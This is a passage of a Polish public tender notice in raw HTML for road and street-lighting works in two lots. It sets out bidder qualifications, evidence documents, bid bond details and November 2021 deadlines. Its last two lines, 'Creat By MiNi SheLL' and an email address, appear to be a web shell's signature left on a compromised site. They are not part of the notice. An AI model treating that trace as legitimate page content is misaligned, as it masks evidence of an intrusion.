posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 250.000 zł, co potwierdzą poprzez złożenie aktualnej informacji banku;<br/><br/>4) zdolności technicznej lub zawodowej: tj. <br/>a) dla części nr 1 - posiadają doświadczenie umożliwiające realizację zamówienia tzn. wykonali należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 robotę budowlaną polegającą na budowie lub przebudowie lub remoncie drogi o nawierzchni bitumicznej wraz <br/>z oświetleniem drogowym o łącznej wartości zadania minimum 250 000,00 zł brutto, co potwierdzą w wykazie wykonanych robót oraz referencjami; <br/><br/>b)	dla części nr 2 -posiadają doświadczenie umożliwiające realizację zamówienia tzn. wykonali należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 robotę budowlaną polegającą na budowie lub przebudowie lub remoncie drogi o nawierzchni bitumicznej o łącznej wartości zadania minimum 300 000,00 zł brutto, co potwierdzą w wykazie wykonanych robót oraz referencjami;<br/> <br/>c)	dysponują lub będą dysponować:<br/>- dla części nr 1 i/lub części nr 2: kierownikiem budowy/robót posiadającym uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia budowlane w tej specjalności, co potwierdzą w wykazie osób zdolnych do realizacji zamówienia.<br/>- dla części nr 1 (dodatkowo): kierownikiem robót branży elektrycznej , posiadającym uprawnienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, na <br/>wykonywanie których w aktualnym stanie prawnym pozwalają uprawnienia <br/>budowlane w tych specjalnościach, co potwierdzą w wykazie osób zdolnych do realizacji zamówienia<br/>3.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegać<br/>na potencjale podmiotu udostępniającego zasoby na zasadach opisanych w art. 118–123 ustawy Pzp. Podmiot, na potencjał którego wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>4.	Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu<br/>udostępniającego zasoby nie potwierdzają spełniania przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>5.	Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <br/>6.	Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą,<br/>który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu<br/>udzielenie zamówienia publicznego, Zamawiający może żądać następujących podmiotowych środków dowodowych:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b)	oświadczenia o braku przynależności do grupy kapitałowej ( wg załącznika Nr 3 ).<br/>Zamawiający żąda od wykonawcy, który na potwierdzenie spełniania warunków udział<br/>u w postępowaniu, polega na zdolnościach lub sytuacji innych podmiotów, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 1 ppkt. 1 lit. a) i b).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty ( wg załącznika Nr 4 ),<br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami ( wg załącznika Nr 5 ),<br/>c)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, z którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia; powinno zawierać: nazwę postępowania o zamówienie publiczne, którego dotyczy, wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/><br/>4) Zobowiązanie podmiotu (jeżeli dotyczy) udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdzający, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą,<br/>Wzór zobowiązania określa załącznik Nr 7.<br/>Zobowiązanie musi być złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>5) Wadium - w poręczeniach lub gwarancjach powinno obejmować przekazanie tego dokumentu w takiej formie, w jakiej został on ustanowiony przez gwaranta, tj. oryginału dokumentu podpisanego kwalifikowanym podpisem elektronicznym przez jego wystawcę. Zamawiający zaleca załączenie do oferty dokumentu potwierdzającego wniesienie wadium w pieniądzu na rachunek bankowy Zamawiającego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: <br/>a)	Dla części Nr 1 - 3 000,00 zł (słownie: trzy tysiące zł). <br/>b)	Dala części Nr 2 - 3 500,00 zł (słownie: trzy tysiące pięćset zł). <br/>2.	Wadium musi obejmować pełen okres związania ofertą.<br/>3.	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy :<br/>Bank : Bank Spółdzielczy Chodzież / Oddział Budzyń <br/>Nr rachunku : 26 8945 0002 2600 0101 2000 0070<br/>Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:<br/>1) wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2) w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia <br/>z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 4 ustawy Pzp,<br/>3) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>4) muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>5) przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców.<br/>6)	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty oświadczenie, z którego będzie wynikać, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zawarto w rozdziale XVII SWZ i §<br/>19 i 20 wzoru umowy - załącznik Nr 6.1 i 6.2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Platformy na adres : https://przetargi.budzyn.pl wg zasad określonych w rozdziale II SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-30 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com